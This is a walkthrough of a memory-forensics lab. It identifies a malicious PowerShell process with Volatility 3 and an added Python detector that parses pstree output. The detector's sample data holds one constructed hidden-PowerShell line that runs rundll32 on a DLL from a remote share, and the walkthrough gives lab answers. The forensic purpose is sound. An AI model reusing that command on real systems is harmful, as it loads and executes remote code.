# Reveal Lab

To answer this endpoint forensics machine, I first looked at the process list to determine what happened. After installing Volatility 3 from this repository: <https://github.com/volatilityfoundation/volatility3>, I use the `-f` parameter followed by the location of the memory file, then the `windows.pstree` plugin to get the process tree and export it. Here is the full command:

<figure><img src="/files/uj9FxozdIAq2P8WTazpq" alt=""><figcaption></figcaption></figure>

```bash
python3 vol.py -f /home/kimo/Desktop/192-Reveal.dmp windows.pstree > /home/kimo/Desktop/Reveal.txt
```

## 1- Identify the malicious process

I dived into the exported file, and from the PPID and the name of the process I felt it is "4120", the process ID, which means it's a newly created process; secondly, the most popular script runner, "Powershell.exe". In its command line I found an IP, took it to VirusTotal to identify it, and it's simply malicious.

<figure><img src="/files/aPVDRrXsGouUN3g79Wb3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BWfnEQSUAh9G6SmDFNk3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sGbkRee7aVmIWKursIxY" alt=""><figcaption></figcaption></figure>

## 2- The parent PID

This question simply asks for the PPID, which was already determined in the previous question.

<figure><img src="/files/kexR0gy79JX0VQDzlsDw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZVk8mmWYz44H9iX6us8Z" alt=""><figcaption></figcaption></figure>

## 3- Filename used by the malware to execute the second payload

Still in the same line: it's a DLL file. Because we are dealing with PowerShell, every small piece of info will lead you to the important info.

<figure><img src="/files/nXcVfICXpaPyO7SFKTKi" alt=""><figcaption></figcaption></figure>

## 4- The shared folder

We are still in the same command; the shared folder is simply right after the IP the malware communicated with (:

<figure><img src="/files/gsOhW0uMlZWD8AfA2wMe" alt=""><figcaption></figcaption></figure>
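Questions 1 to 4 all come from reading one `windows.pstree` line: a PowerShell child process whose command line carries an IP, a shared folder and a DLL name. As an added example (not part of the original writeup, and not real lab data), this script parses the exported pstree text and pulls those three values out automatically. It assumes the Volatility 3 column layout that includes a `Cmd` column; the sample rows, the IP (documentation range 192.0.2.0/24), the PPID 3300 and the share/DLL names are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of `windows.pstree` text output (assumed columns incl. Cmd;
# leading '*' marks tree depth). PPID 3300, IP, share and DLL name are made up.
SAMPLE_PSTREE = """\
PID\tPPID\tImageFileName\tOffset(V)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tAudit\tCmd\tPath
4\t0\tSystem\t0x8c8e0a0\t120\t-\tN/A\tFalse\t2024-01-01 10:00:00\tN/A\t-\t-\t-
* 3300\t4\texplorer.exe\t0x8d1f0c0\t40\t-\t1\tFalse\t2024-01-01 10:01:00\tN/A\t\\Device\\HarddiskVolume2\\Windows\\explorer.exe\tC:\\Windows\\explorer.exe\tC:\\Windows\\explorer.exe
** 4120\t3300\tpowershell.exe\t0x8e2a100\t12\t-\t1\tFalse\t2024-01-01 10:05:00\tN/A\t\\Device\\HarddiskVolume2\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -w hidden -c rundll32 \\\\192.0.2.10\\files\\payload.dll,Start\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\([^\\\s]+)")  # \\host\share -> (host, share)
DLL_RE = re.compile(r"[\w.-]+\.dll", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    ppid: int
    image: str
    ip: Optional[str]
    share: Optional[str]
    dll: Optional[str]


def parse_pstree(text: str) -> List[dict]:
    """Turn the tab-separated pstree dump into one dict per process row."""
    lines = text.strip().splitlines()
    header = lines[0].split("\t")
    rows = []
    for line in lines[1:]:
        fields = line.split("\t")
        fields[0] = fields[0].lstrip("* ")  # drop the tree-depth markers
        rows.append(dict(zip(header, fields)))
    return rows


def find_suspicious(text: str) -> List[Finding]:
    """Flag powershell.exe rows whose command line names an IP, UNC share or DLL."""
    findings = []
    for row in parse_pstree(text):
        if row["ImageFileName"].lower() != "powershell.exe":
            continue
        cmd = row.get("Cmd", "")
        ip, unc, dll = IP_RE.search(cmd), UNC_RE.search(cmd), DLL_RE.search(cmd)
        if not (ip or unc or dll):
            continue
        findings.append(Finding(int(row["PID"]), int(row["PPID"]), row["ImageFileName"],
                                ip.group(0) if ip else None,
                                unc.group(2) if unc else None,
                                dll.group(0) if dll else None))
    return findings
```

Point it at the real `Reveal.txt` export instead of `SAMPLE_PSTREE`; the IP it extracts is what you then check on VirusTotal or ThreatFox.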

## 5- MITRE sub-technique ID

The question wants the sub-technique ID. The main technique used here is Defense Evasion, and in the sub-stage the payload used a DLL file to execute, so here we go.

<figure><img src="/files/f0tJM551tdKibFNxS05U" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sGNeMoI0tUeT9l8liIGH" alt=""><figcaption></figcaption></figure>

## 6- The username

To determine the username I used Volatility again, but with the UserAssist plugin, and found it easily: Uncle Elon was compromised. I think the attacker sent him a mail to win an iPhone 16 (:

<figure><img src="/files/nteoipKsBdh8hldStVJy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cLTdPW9R9K2DhPzgTb80" alt=""><figcaption></figcaption></figure>

## 7- The malware name

Here I used ThreatFox to determine the name.

<figure><img src="/files/2WQZ7OcOFk8iiijSUjPt" alt=""><figcaption></figcaption></figure>

> Thanks for reading (:
